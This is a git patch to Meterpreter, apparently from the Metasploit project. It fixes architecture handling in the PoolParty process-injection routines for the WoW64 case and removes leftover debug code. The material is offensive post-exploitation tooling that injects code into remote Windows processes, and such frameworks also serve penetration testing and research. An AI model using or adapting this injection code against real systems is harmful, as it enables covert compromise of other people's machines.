From b18df9c9fe44bee5f0b0cba4fb998ada4e9a745f Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Mon, 2 Sep 2024 07:28:04 -0400 Subject: [PATCH] fix: handling WoW64 injection destinationArch --- c/meterpreter/source/metsrv/base_inject.c | 1 + c/meterpreter/source/metsrv/pool_party.c | 3 --- 2 files changed, 1 insertion(+), 3 deletions(-) diff --git a/c/meterpreter/source/metsrv/base_inject.c b/c/meterpreter/source/metsrv/base_inject.c index ce4a7716..8700699a 100644 --- a/c/meterpreter/source/metsrv/base_inject.c +++ b/c/meterpreter/source/metsrv/base_inject.c @@ -573,6 +573,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW memcpy(lpStub, x64tox86, sizeof(x64tox86) - 1); memcpy((LPBYTE)lpStub + sizeof(x64tox86) - 1, poolparty_stub_x86, sizeof(poolparty_stub_x86)); dwStubSize = sizeof(x64tox86) + sizeof(poolparty_stub_x86) - 2; + dwDestinationArch = PROCESS_ARCH_X64; } hTriggerEvent = CreateEvent(NULL, TRUE, FALSE, NULL); diff --git a/c/meterpreter/source/metsrv/pool_party.c b/c/meterpreter/source/metsrv/pool_party.c index c6407e8f..45b1a5b5 100644 --- a/c/meterpreter/source/metsrv/pool_party.c +++ b/c/meterpreter/source/metsrv/pool_party.c @@ -163,14 +163,11 @@ DWORD remote_tp_direct_insertion(HANDLE hProcess, DWORD dwDestinationArch, LPVOI pNtDll* ntDll = NULL; DWORD dwResult = ERROR_POOLPARTY_GENERIC; HANDLE hHeap = GetProcessHeap(); - dwDestinationArch = PROCESS_ARCH_X64; DWORD dwDirectSize = dwDestinationArch == PROCESS_ARCH_X64 ? TP_DIRECT_STRUCT_SIZE_X64 : TP_DIRECT_STRUCT_SIZE_X86; - WOW64_CONTEXT test = { 0 }; LPVOID *Direct = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwDirectSize); do { ntDll = GetOrInitNtDll(); - dprintf("%d fs offset: %p", sizeof(WOW64_CONTEXT), (QWORD)&test.SegFs - (QWORD)&test); if (ntdll == NULL) { BREAK_WITH_ERROR("[INJECT][inject_via_poolparty][remote_tp_direct_insertion] Cannot GetOrInitNtDll()", ERROR_POOLPARTY_GENERIC); }